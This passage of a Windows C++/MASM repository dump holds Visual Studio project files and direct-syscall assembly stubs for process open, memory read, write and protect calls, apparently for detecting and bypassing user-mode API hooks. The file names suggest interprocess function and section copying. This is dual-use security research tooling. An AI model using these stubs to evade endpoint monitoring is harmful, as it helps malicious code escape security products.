{2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x64.ActiveCfg = Release|x64 57 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x64.Build.0 = Release|x64 58 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x86.ActiveCfg = Release|Win32 59 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x86.Build.0 = Release|Win32 60 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x64.ActiveCfg = Debug|x64 61 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x64.Build.0 = Debug|x64 62 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x86.ActiveCfg = Debug|Win32 63 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Debug|x86.Build.0 = Debug|Win32 64 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x64.ActiveCfg = Release|x64 65 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x64.Build.0 = Release|x64 66 | 
{594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x86.ActiveCfg = Release|Win32 67 | {594AD1A0-2692-4C42-BC7B-B1799E500CC6}.Release|x86.Build.0 = Release|Win32 68 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x64.ActiveCfg = Debug|x64 69 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x64.Build.0 = Debug|x64 70 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x86.ActiveCfg = Debug|Win32 71 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Debug|x86.Build.0 = Debug|Win32 72 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x64.ActiveCfg = Release|x64 73 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x64.Build.0 = Release|x64 74 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x86.ActiveCfg = Release|Win32 75 | {5785080C-1A0F-4C44-A7CD-B65504B3A62A}.Release|x86.Build.0 = Release|Win32 76 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x64.ActiveCfg = Debug|x64 77 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x64.Build.0 = Debug|x64 78 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x86.ActiveCfg = Debug|Win32 79 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Debug|x86.Build.0 = Debug|Win32 80 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x64.ActiveCfg = Release|x64 81 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x64.Build.0 = Release|x64 82 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x86.ActiveCfg = Release|Win32 83 | {DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}.Release|x86.Build.0 = Release|Win32 84 | EndGlobalSection 85 | GlobalSection(SolutionProperties) = preSolution 86 | HideSolutionNode = FALSE 87 | EndGlobalSection 88 | GlobalSection(ExtensibilityGlobals) = postSolution 89 | SolutionGuid = {1A48B0F9-A928-4BAA-8F59-8DA36F6AB26F} 90 | EndGlobalSection 91 | EndGlobal 92 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/HookFinder.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 
7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | Source Files 36 | 37 | 38 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/HookFinder.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | HookDetector 24 | 10.0 25 | HookDetector 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | DebugFull 89 | Console 90 | 91 | 92 | 93 | 94 | Level3 95 | MaxSpeed 96 | true 97 | true 98 | true 99 | MultiThreaded 100 | 101 | 102 | true 103 | true 104 | 105 | 106 | 107 | 108 | Level3 109 | MaxSpeed 110 | true 111 | true 112 | true 113 | MultiThreaded 114 | 115 | 116 | true 117 | true 118 | false 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: 
https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | 
mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | 
ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/main.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | void LoadProloguesFromDisk(DllFunctionMap& expectedData); 4 | 5 | void LoadInterestingLibraries(std::set& dllsToProcess, int& pid); 6 | 7 | -------------------------------------------------------------------------------- /CustomCode/HookFinder/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtRVM PROC 4 | mov eax, 003fh 5 | mov r10, rcx 6 | syscall 7 | ret 8 | NtRVM ENDP 9 | 10 | NtOP PROC 11 | mov eax, 0026h 12 | mov r10, rcx 13 | syscall 14 | ret 15 | NtOP ENDP 16 | 17 | 18 | end -------------------------------------------------------------------------------- /CustomCode/HookFinder/sysc_sw2.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtRVM( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress OPTIONAL, 8 | OUT PVOID Buffer, 9 | IN SIZE_T BufferSize, 10 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 11 | 12 | EXTERN_C NTSTATUS NtOP( 13 | OUT PHANDLE ProcessHandle, 14 | IN ACCESS_MASK DesiredAccess, 15 | IN POBJECT_ATTRIBUTES ObjectAttributes, 16 | IN PCLIENT_ID ClientId OPTIONAL); 17 | 18 | 19 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/InterprocessMethodCloning.vcxproj: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | HookDetectorTM 24 | 10.0 25 | InterProcessFunctionCopying 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/InterprocessMethodCloning.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | Source Files 36 | 37 | 38 | 
-------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | 
ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | 
ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtReadVirtualMemory PROC 4 | mov rax, gs:[60h] ; Load PEB into RAX. 5 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 6 | cmp dword ptr [rax+118h], 10 7 | je NtReadVirtualMemory_Check_10_0_XXXX 8 | jmp NtReadVirtualMemory_SystemCall_Unknown 9 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 
10 | cmp word ptr [rax+120h], 10240 11 | je NtReadVirtualMemory_SystemCall_10_0_10240 12 | cmp word ptr [rax+120h], 10586 13 | je NtReadVirtualMemory_SystemCall_10_0_10586 14 | cmp word ptr [rax+120h], 14393 15 | je NtReadVirtualMemory_SystemCall_10_0_14393 16 | cmp word ptr [rax+120h], 15063 17 | je NtReadVirtualMemory_SystemCall_10_0_15063 18 | cmp word ptr [rax+120h], 16299 19 | je NtReadVirtualMemory_SystemCall_10_0_16299 20 | cmp word ptr [rax+120h], 17134 21 | je NtReadVirtualMemory_SystemCall_10_0_17134 22 | cmp word ptr [rax+120h], 17763 23 | je NtReadVirtualMemory_SystemCall_10_0_17763 24 | cmp word ptr [rax+120h], 18362 25 | je NtReadVirtualMemory_SystemCall_10_0_18362 26 | cmp word ptr [rax+120h], 18363 27 | je NtReadVirtualMemory_SystemCall_10_0_18363 28 | cmp word ptr [rax+120h], 19041 29 | je NtReadVirtualMemory_SystemCall_10_0_19041 30 | cmp word ptr [rax+120h], 19042 31 | je NtReadVirtualMemory_SystemCall_10_0_19042 32 | jmp NtReadVirtualMemory_SystemCall_Unknown 33 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 34 | mov eax, 003fh 35 | jmp NtReadVirtualMemory_Epilogue 36 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 37 | mov eax, 003fh 38 | jmp NtReadVirtualMemory_Epilogue 39 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 40 | mov eax, 003fh 41 | jmp NtReadVirtualMemory_Epilogue 42 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 43 | mov eax, 003fh 44 | jmp NtReadVirtualMemory_Epilogue 45 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 46 | mov eax, 003fh 47 | jmp NtReadVirtualMemory_Epilogue 48 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 49 | mov eax, 003fh 50 | jmp NtReadVirtualMemory_Epilogue 51 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 52 | mov eax, 003fh 53 | jmp NtReadVirtualMemory_Epilogue 54 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 
10.0.18362 (1903) 55 | mov eax, 003fh 56 | jmp NtReadVirtualMemory_Epilogue 57 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 58 | mov eax, 003fh 59 | jmp NtReadVirtualMemory_Epilogue 60 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 61 | mov eax, 003fh 62 | jmp NtReadVirtualMemory_Epilogue 63 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 64 | mov eax, 003fh 65 | jmp NtReadVirtualMemory_Epilogue 66 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 67 | ret 68 | NtReadVirtualMemory_Epilogue: 69 | mov r10, rcx 70 | syscall 71 | ret 72 | NtReadVirtualMemory ENDP 73 | 74 | end -------------------------------------------------------------------------------- /CustomCode/InterprocessMethodCloning/sysc_sw2.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtReadVirtualMemory( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress OPTIONAL, 8 | OUT PVOID Buffer, 9 | IN SIZE_T BufferSize, 10 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 11 | 12 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/InterProcessSectionCopying.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4} 23 | HookDetectorTM 24 | 10.0 25 | InterProcessSectionCopying 26 | 27 | 28 | 29 | Application 30 | true 31 | v142 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v142 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v142 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v142 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 
| 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | Console 89 | 90 | 91 | 92 | 93 | Level3 94 | MaxSpeed 95 | true 96 | true 97 | true 98 | MultiThreaded 99 | 100 | 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | MaxSpeed 109 | true 110 | true 111 | true 112 | MultiThreaded 113 | 114 | 115 | true 116 | true 117 | false 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/InterProcessSectionCopying.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 
4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 